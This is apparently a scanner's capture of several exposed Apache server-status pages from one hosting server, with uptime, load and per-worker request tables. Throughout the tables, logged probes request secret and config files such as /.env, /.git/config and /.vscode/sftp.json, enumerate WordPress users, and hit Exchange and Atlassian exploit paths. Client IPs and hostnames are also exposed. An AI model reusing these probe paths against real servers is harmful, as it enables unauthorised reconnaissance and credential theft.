46.101.103.192http/1.1 3-7693030/2/457_ 0.08015308260.00.0110.54 139.59.65.144http/1.1relehse.com:443GET /.env HTTP/1.1 3-7693030/1/516_ 0.0800366780.00.0012.41 207.154.240.169http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-7693030/1/530_ 0.050305437230.00.009.54 193.138.7.149h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-7693030/4/657_ 0.0800388400.00.0413.50 46.101.103.192http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-7693030/3/570_ 0.07016374020.00.228.82 46.101.103.192http/1.1 3-7693030/1/627_ 0.08017325270.00.015.84 139.59.65.144http/1.1relehse.com:443GET /.git/config HTTP/1.1 4-7694340/5/5062_ 0.14004157270.00.02118.56 207.154.240.169http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 4-7694340/2/5281_ 0.14003739190.00.0195.26 207.154.240.169http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 4-7694340/4/4884_ 0.14003471770.00.0195.19 46.101.103.192http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-7694340/3/5372W 0.13004099180.00.01134.43 46.101.103.192http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-7694340/4/5258_ 0.14003383770.00.0187.87 207.154.240.169http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-7694340/0/5399_ 0.001364323650.00.00143.86 193.138.7.149h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-7694340/36/5385_ 0.111384372840.00.18147.74 181.115.62.65h2tandemsl.com:443idle, streams: 0/44/44/0/0 (open/recv/resp/push/rst) 4-7694340/1/5071_ 0.130183845810.00.01100.48 139.59.230.191http/1.1relehse.com:443GET /login.action HTTP/1.1 4-7694340/3/4787_ 0.1302223405220.00.09111.83 46.101.103.192
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e3fd450932
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Monday, 10-Jul-2023 22:44:57 CEST Restart Time: Wednesday, 28-Jun-2023 18:59:25 CEST Parent Server Config. Generation: 19 Parent Server MPM Generation: 18 Server uptime: 12 days 3 hours 45 minutes 31 seconds Server load: 0.10 0.06 0.01 Total accesses: 454586 - Total Traffic: 8.9 GB - Total Duration: 51906431 CPU Usage: u26.48 s42.44 cu1863.01 cs1278.6 - .306% CPU load .433 requests/sec - 8.9 kB/second - 20.5 kB/request - 114.184 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0591109no1yes010001 1590977no0yes010000 2590979no0yes010000 3590978no0yes010000 4590976no0yes19000 Sum501 149001 _______________________________________________W__ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-185911090/3/12741_ 0.094014619130.00.02266.36 162.243.184.251http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-185911090/5/13524_ 0.104013826740.00.02284.97 146.190.98.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-185911090/4/13185_ 0.091014006780.00.04307.22 162.243.184.251http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 0-185911090/3/13575_ 0.0552013628000.00.01283.21 146.190.98.165http/1.1 0-185911090/1/14180_ 0.090014383830.00.00323.65 162.243.184.251http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 0-185911090/7/14094_ 0.100013187350.00.02292.74 146.190.98.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-185911090/4/13752_ 0.104013940650.00.01287.92 146.190.98.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-185911090/5/13819_ 0.103013341930.00.02321.93 146.190.98.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-185911090/5/13725_ 0.101014152240.00.02307.88 179.43.169.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-185911090/7/13020_ 0.095014678930.00.01277.93 162.243.184.251http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 1-185909770/2/3940_ 0.0272174554770.00.0168.69 178.128.151.41http/1.1relehse.com:443GET /_all_dbs HTTP/1.1 1-185909770/2/3362_ 0.0372134781860.00.0178.67 142.93.158.96http/1.1relehse.com:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-185909770/2/3786_ 0.017305282860.00.0066.27 162.243.184.251http/1.1relehse.com:80GET /.env HTTP/1.1 1-185909770/0/3781_ 0.007203908940.00.0068.67 23.178.112.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.well-known/acme-challenge/zcB_8cr-xRURRSECOFZF0c21GmB3yQs 1-185909770/1/3769_ 0.0273165211620.00.0072.61 178.128.151.41http/1.1relehse.com:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-185909770/2/4283_ 0.023245126570.00.0172.70 171.67.70.229http/1.1 1-185909770/1/3980_ 0.01904934720.00.0075.51 146.190.98.165h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-185909770/3/3893_ 0.06304543180.00.0266.45 171.67.70.229http/1.1relehse.com:80GET /login HTTP/1.1 1-185909770/2/3770_ 0.0274174489690.00.0179.18 142.93.158.96http/1.1relehse.com:443GET /debug/default/view?panel=config HTTP/1.1 1-185909770/0/3638_ 0.007414387560.00.0085.26 66.249.66.201http/1.1 2-185909790/3/13980_ 0.0510013249610.00.01267.85 146.190.98.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-185909790/1/14095_ 0.02101414468760.00.01287.57 179.43.169.181http/1.1relehse.com:443GET / HTTP/1.1 2-185909790/2/14430_ 0.0510014359720.00.01282.46 162.243.184.251http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-185909790/1/14612_ 0.02101615979660.00.01276.62 142.93.158.96http/1.1relehse.com:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-185909790/0/14842_ 0.007013674770.00.00295.07 146.190.98.165http/1.1 2-185909790/2/14982_ 0.0562213544640.00.01270.16 171.67.70.229http/1.1relehse.com:443GET / HTTP/1.1 2-185909790/0/14282_ 0.006614868350.00.00284.83 146.190.98.165http/1.1 2-185909790/0/13413_ 0.0066013942010.00.00249.34 186.88.195.169h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-185909790/1/13972_ 0.0231313429180.00.01277.58 171.67.70.229http/1.1 2-185909790/2/14360_ 0.0732230177900.00.00288.64 171.67.70.229http/1.1relehse.com:443GET /login HTTP/1.1 3-185909780/1/9834_ 0.0272189823450.00.01185.78 142.93.158.96http/1.1relehse.com:443GET /.vscode/sftp.json HTTP/1.1 3-185909780/2/10123_ 0.02731510355140.00.02193.89 142.93.158.96http/1.1relehse.com:443GET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 3-185909780/1/10027_ 0.017010225550.00.00170.07 162.243.184.251http/1.1relehse.com:80GET /.git/config HTTP/1.1 3-185909780/1/10107_ 0.017010804590.00.00179.42 167.99.184.41http/1.1relehse.com:80GET /login.action HTTP/1.1 3-185909780/2/10134_ 0.059010424350.00.01174.82 162.243.184.251http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-185909780/2/9375_ 0.0510010833600.00.00167.92 162.243.184.251http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-185909780/1/9896_ 0.00703010184300.00.01194.83 178.128.151.41http/1.1relehse.com:443GET / HTTP/1.1 3-185909780/1/9711_ 0.001109700020.00.00183.12 162.243.184.251http/1.1relehse.com:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-185909780/0/10839_ 0.0070011949310.00.00237.32 186.169.218.83h2tandemsl.com:443idle, streams: 0/5/5/0/0 (open/recv/resp/push/rst) 3-185909780/2/9960_ 0.0511010028770.00.00182.55 162.243.184.251http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-185909760/10/3907_ 0.21207363390.00.0566.41 146.190.98.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-185909760/7/3799_ 0.201166946820.00.0572.57 171.67.70.229http/1.1relehse.com:443GET / HTTP/1.1 4-185909760/28/3669_ 0.213186516620.00.3870.68 171.67.70.229http/1.1relehse.com:443GET /login HTTP/1.1 4-185909760/7/3946_ 0.21107578840.00.0678.26 146.190.98.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-185909760/6/3646_ 0.21306484270.00.0173.46 171.67.70.229http/1.1relehse.com:80GET /login HTTP/1.1 4-185909760/5/3819_ 0.1726487194640.00.0865.51 189.108.178.6http/1.1tandemsl.com:443GET / HTTP/1.1 4-185909760/10/3687_ 0.19307407470.00.0388.25 171.67.70.229http/1.1 4-185909760/5/3399W 0.19006693040.00.0463.31 146.190.98.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-18
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e36e2f0489
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Sunday, 12-Mar-2023 11:19:50 CET Restart Time: Saturday, 07-Jan-2023 18:56:40 CET Parent Server Config. Generation: 37 Parent Server MPM Generation: 36 Server uptime: 63 days 16 hours 23 minutes 10 seconds Server load: 0.04 0.03 0.00 Total accesses: 3436704 - Total Traffic: 63.4 GB - Total Duration: 609494936 CPU Usage: u140.03 s221.64 cu11259.7 cs7598.08 - .349% CPU load .625 requests/sec - 12.1 kB/second - 19.3 kB/request - 177.349 ms/request 9 requests currently being processed, 41 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 030499no0yes010000 130360no0yes55000 230462no1yes19000 330358no0yes010000 430359no0yes37000 Sum501 941000 ____________RR_R__WR__R_________________RR_______W Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-36304990/1/65597_ 0.02462290780490.02.981191.42 66.249.64.216http/1.1tandemsl.com:443GET /wp-content/uploads/2019/09/Compresed-v1.mp4 HTTP/1.1 0-36304990/0/64793_ 0.001182710160.00.001238.48 66.249.64.216http/1.1 0-36304990/0/63981_ 0.0001107042700.00.001224.63 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc\x16\x03\x01\x01%\x01 0-36304990/0/62642_ 0.000079629010.00.001220.63 209.141.55.120http/1.1tandemsl.com:443GET /wp-includes/images/w-logo-blue-white-bg.png HTTP/1.1 0-36304990/1/61457_ 0.0200184383330.00.001240.43 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 0-36304990/1/62040_ 0.020076368040.00.001198.09 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 0-36304990/1/65555_ 0.020099808560.00.001255.79 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 0-36304990/0/64747_ 0.0000105091110.00.001236.21 124.220.186.134http/1.1 0-36304990/0/63710_ 0.0005291848810.00.001259.11 161.35.27.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-36304990/0/62685_ 0.00250111863780.00.001210.02 111.7.96.158http/1.1 1-36303600/1/69164_ 0.0200219604760.00.001246.95 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/search?folderIds=0 HTTP/1.1 1-36303600/2/69450_ 0.0400191606210.00.011313.18 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 1-36303600/1/68915R 0.020996141413690.00.031399.41 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc 1-36303600/1/68676R 0.010188130475200.00.011259.47 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc 1-36303600/2/68382_ 0.040091441360.00.011314.92 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-36303600/3/68021R 0.0200110364660.00.001219.79 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc 1-36303600/0/68694_ 0.0000151430480.00.001289.14 3.15.9.213http/1.1relehse.com:80GET /.well-known/acme-challenge/eD1uQAs85L3cjyxRJ4lWEwHpMgpHDy6 1-36303600/2/70105_ 0.0200110996180.00.001263.47 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 1-36303600/0/70921W 0.0000118713650.00.001309.39 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /info.php HTTP/1.1 1-36303600/0/69955R 0.00410138053750.00.001348.98 161.35.27.144http/1.1 2-36304620/2/80187_ 0.0100141685160.00.191493.55 161.35.27.144http/1.1 2-36304620/0/81939_ 0.0000131226400.00.001604.21 161.35.27.144http/1.1 2-36304620/0/81042R 0.0013446113324300.00.001643.62 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc 2-36304620/0/79134_ 0.00130140359620.00.001568.42 81.203.108.133h2tandemsl.com:443idle, streams: 0/55/55/0/0 (open/recv/resp/push/rst) 2-36304620/1/80742_ 0.0201118119030.00.011675.88 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcHELP 2-36304620/0/79993_ 0.0000138318070.00.001529.09 81.203.108.133h2tandemsl.com:443idle, streams: 0/24/24/0/0 (open/recv/resp/push/rst) 2-36304620/1/80423_ 0.0200106901410.00.001502.11 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 2-36304620/1/80066_ 0.0200118229540.00.001652.00 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /info.php HTTP/1.1 2-36304620/0/79602_ 0.0000123950680.00.001649.90 161.35.27.144http/1.1 2-36304620/1/78249_ 0.0200114233620.00.001569.92 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 3-36303580/0/57149_ 0.004123593998600.00.001048.07 83.96.245.221h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-36303580/0/58192_ 0.0002195252770.00.001086.47 51.178.207.154h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-36303580/0/59561_ 0.00018283557280.00.001090.46 161.35.27.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-36303580/0/57863_ 0.0041093995720.00.001101.30 101.227.1.196http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-36303580/1/57165_ 0.0100192955920.00.001073.48 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-36303580/0/59000_ 0.00082790305620.00.001045.39 161.35.27.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-36303580/1/56586_ 0.020074606850.00.011044.35 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-36303580/0/57391_ 0.00029139012440.00.001069.96 161.35.27.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-36303580/0/56558_ 0.00410128801060.00.001096.37 23.178.112.209http/1.1relehse.com:80GET /.well-known/acme-challenge/PSvRlLcI5k1t3b2kSAiYlyVshb9NV5i 3-36303580/0/58884_ 0.0001103609390.00.001035.46 161.35.27.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-36303590/1/71980R 0.00302105680140.00.001320.66 161.35.27.144http/1.1 4-36303590/0/71298R 0.00300106678310.00.001278.03 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc 4-36303590/0/73265_ 0.00300105233910.00.001314.15 81.203.108.133h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-36303590/2/71644_ 0.0200109365060.00.001255.51 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 4-36303590/1/72980_ 0.0200108239360.00.001336.99 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 4-36303590/0/72023_ 0.004119793945150.00.001348.14 205.185.122.184http/1.1tandemsl.com:443GET / HTTP/1.1 4-36303590/0/74224_ 0.0000162596060.00.001334.93 177.231.30.222h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-36303590/0/73621_ 0.000293068150.00.001298.95 161.35.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e3f9bd5b69
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Wednesday, 11-Jan-2023 04:28:43 CET Restart Time: Saturday, 07-Jan-2023 18:56:40 CET Parent Server Config. Generation: 8 Parent Server MPM Generation: 7 Server uptime: 3 days 9 hours 32 minutes 3 seconds Server load: 0.42 0.11 0.03 Total accesses: 167292 - Total Traffic: 2.6 GB - Total Duration: 23877640 CPU Usage: u7.24 s11.74 cu528.65 cs370.92 - .313% CPU load .57 requests/sec - 9.2 kB/second - 16.1 kB/request - 142.73 ms/request 12 requests currently being processed, 38 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03901536no0yes37000 13901537no0yes010000 23901538no0yes19000 33901670no10yes190010 43901539no0yes73000 Sum5010 12380010 R______R_R_________________R__W_________RRRRR_R__R Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-739015360/1/1013R 0.0400676540.00.0010.16 164.92.135.200http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc 0-739015360/3/821_ 0.0600749880.00.0215.30 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 0-739015360/0/925_ 0.0001741004510.00.0012.90 164.92.135.200http/1.1 0-739015360/3/1076_ 0.06001159100.00.0127.44 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-739015360/2/973_ 0.05042600320.00.0216.35 164.92.135.200h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-739015360/1/794_ 0.05060753930.00.0114.00 164.92.135.200h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-739015360/3/1206_ 0.0500506160.00.0318.12 164.92.135.200h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-739015360/3/751R 0.05001519070.00.017.90 164.92.135.200http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc 0-739015360/3/908_ 0.0600813720.00.0123.11 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /info.php HTTP/1.1 0-739015360/2/806R 0.05016620700.00.0212.11 164.92.135.200http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc 1-739015370/3/2201_ 0.040391453120.00.0124.03 159.223.62.150http/1.1relehse.com:443GET /telescope/requests HTTP/1.1 1-739015370/4/1828_ 0.042382055740.00.0125.54 159.223.62.150http/1.1relehse.com:443GET /debug/default/view?panel=config HTTP/1.1 1-739015370/1/2060_ 0.02002747680.00.0029.70 159.223.62.150http/1.1 1-739015370/0/2187_ 0.0002562336790.00.0032.09 164.92.135.200http/1.1 1-739015370/3/2129_ 0.040481835920.00.0123.59 159.223.62.150http/1.1relehse.com:443GET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 1-739015370/2/2256_ 0.050013941400.00.0031.13 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/search?folderIds=0 HTTP/1.1 1-739015370/1/2103_ 0.050014249710.00.0034.57 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 1-739015370/0/2181_ 0.00001605270.00.0041.79 164.92.135.200h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-739015370/2/1653_ 0.04001578540.00.0131.84 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 1-739015370/3/2754_ 0.040011073600.00.0136.23 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-739015380/4/945_ 0.06001167080.00.0220.54 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 2-739015380/2/938_ 0.0400857710.00.0114.94 45.33.108.175http/1.1relehse.com:80GET /login.action HTTP/1.1 2-739015380/2/1077_ 0.04057836170.00.0123.34 178.62.221.40http/1.1relehse.com:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-739015380/5/776_ 0.05017696410.00.0417.98 164.92.135.200h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-739015380/3/776_ 0.06001062630.00.0219.23 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 2-739015380/1/767_ 0.0500573940.00.0111.97 164.92.135.200http/1.1 2-739015380/2/772_ 0.0600500180.00.0111.25 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 2-739015380/1/716R 0.033019799760.00.0013.68 164.92.135.200http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc 2-739015380/1/802_ 0.0600988110.00.0016.94 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-739015380/0/1024_ 0.0002906030.00.0011.63 159.223.62.150http/1.1 3-739016700/3/6196W 0.080012903830.00.0391.27 164.92.135.200http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-739016700/3/6243_ 0.09006441350.00.01119.86 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-739016700/1/5706_ 0.070166436830.00.0190.20 178.62.221.40http/1.1relehse.com:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-739016700/2/6042_ 0.08508628910.00.0299.14 39.110.218.101http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-739016700/1/6109_ 0.08005633350.00.0087.99 164.92.135.200http/1.1 3-739016700/4/5752_ 0.09005373140.00.0298.42 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 3-739016700/2/6000_ 0.080165780830.00.0186.76 178.62.221.40http/1.1relehse.com:443GET /config.json HTTP/1.1 3-739016700/4/6553_ 0.070364844170.00.03110.94 39.110.218.101http/1.1 3-739016700/1/5605_ 0.09005199270.00.0096.76 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-739016700/4/5959_ 0.070389811100.00.0390.15 178.62.221.40http/1.1relehse.com:443GET /telescope/requests HTTP/1.1 4-739015390/2/6228R 0.05006383080.00.0192.35 164.92.135.200http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc 4-739015390/0/6647R 0.00006172270.00.0085.16 164.92.135.200http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc 4-739015390/2/7351R 0.05006130590.00.01117.43 164.92.135.200http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc 4-739015390/3/7162R 0.04006754950.00.01114.19 164.92.135.200http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc 4-739015390/2/6316R 0.04005882830.00.0097.01 164.92.135.200http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc 4-739015390/2/6934_ 0.040435903240.00.02101.72 164.92.135.200http/1.1 4-739015390/3/6902R 0.040126814970.00.02126.93 164.92.135.200http/1.1 4-739015390/3/7171_ 0.05008404310.00.00109.70 139.144.69.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 4-739015390/1/6957_ 0.020010003130.00.0086.39 159.223.62.150http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e3c6250202
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Monday, 12-Sep-2022 07:51:37 CEST Restart Time: Thursday, 25-Aug-2022 11:36:20 CEST Parent Server Config. Generation: 12 Parent Server MPM Generation: 11 Server uptime: 17 days 20 hours 15 minutes 17 seconds Server load: 0.04 0.03 0.00 Total accesses: 603790 - Total Traffic: 36.2 GB - Total Duration: 26276404 CPU Usage: u34.56 s55.68 cu1363.8 cs1442.34 - .188% CPU load .392 requests/sec - 24.6 kB/second - 62.8 kB/request - 43.5191 ms/request 9 requests currently being processed, 41 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0950601no0yes28000 1950605no8yes010007 2950604no0yes46000 3950734no0yes37000 4950603no12yes0100012 Sum5020 9410019 ___WR________________RR__R_R_______R_R_R__________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-119506010/1/8252_ 0.00202884990.00.00401.77 178.79.186.230http/1.1relehse.com:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-119506010/1/8242_ 0.00003027240.00.00325.00 192.46.213.148http/1.1 0-119506010/2/8304_ 0.00002774950.00.00356.63 188.166.247.165http/1.1relehse.com:80GET /about HTTP/1.1 0-119506010/3/8178W 0.01003229130.00.00325.11 194.233.164.30http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-119506010/2/8338R 0.01102764600.00.00378.39 194.233.164.30http/1.1 0-119506010/2/8231_ 0.021352565940.00.01340.26 192.46.213.148http/1.1relehse.com:443GET /.DS_Store HTTP/1.1 0-119506010/0/8250_ 0.000872525810.00.00290.18 194.233.164.30http/1.1 0-119506010/2/8294_ 0.010142541590.00.02364.67 192.46.213.148http/1.1 0-119506010/2/8272_ 0.021132903300.00.02363.06 192.46.213.148http/1.1relehse.com:443GET / HTTP/1.1 0-119506010/2/8260_ 0.010342835020.00.01337.20 194.233.164.30http/1.1 1-119506050/2/13120_ 0.030145761630.00.01736.05 192.46.213.148http/1.1relehse.com:443GET /about HTTP/1.1 1-119506050/2/13037_ 0.01006253370.00.01856.41 207.154.241.99http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-119506050/2/13119_ 0.010135760490.00.01841.15 194.233.164.30http/1.1 1-119506050/2/13099_ 0.010175510750.00.01906.98 195.74.76.198http/1.1 1-119506050/2/13123_ 0.030145740020.00.02872.28 192.46.213.148http/1.1relehse.com:443GET /config.json HTTP/1.1 1-119506050/3/13137_ 0.030145985450.00.01804.04 192.46.213.148http/1.1relehse.com:443GET /api/search?folderIds=0 HTTP/1.1 1-119506050/1/13145_ 0.030146136950.00.01882.44 192.46.213.148http/1.1relehse.com:443GET /v2/_catalog HTTP/1.1 1-119506050/1/13104_ 0.01005761720.00.001034.20 194.233.164.30http/1.1 1-119506050/0/13134_ 0.00005784410.00.00867.02 192.46.213.148http/1.1 1-119506050/1/13045_ 0.00005788210.00.00876.46 194.233.164.30http/1.1 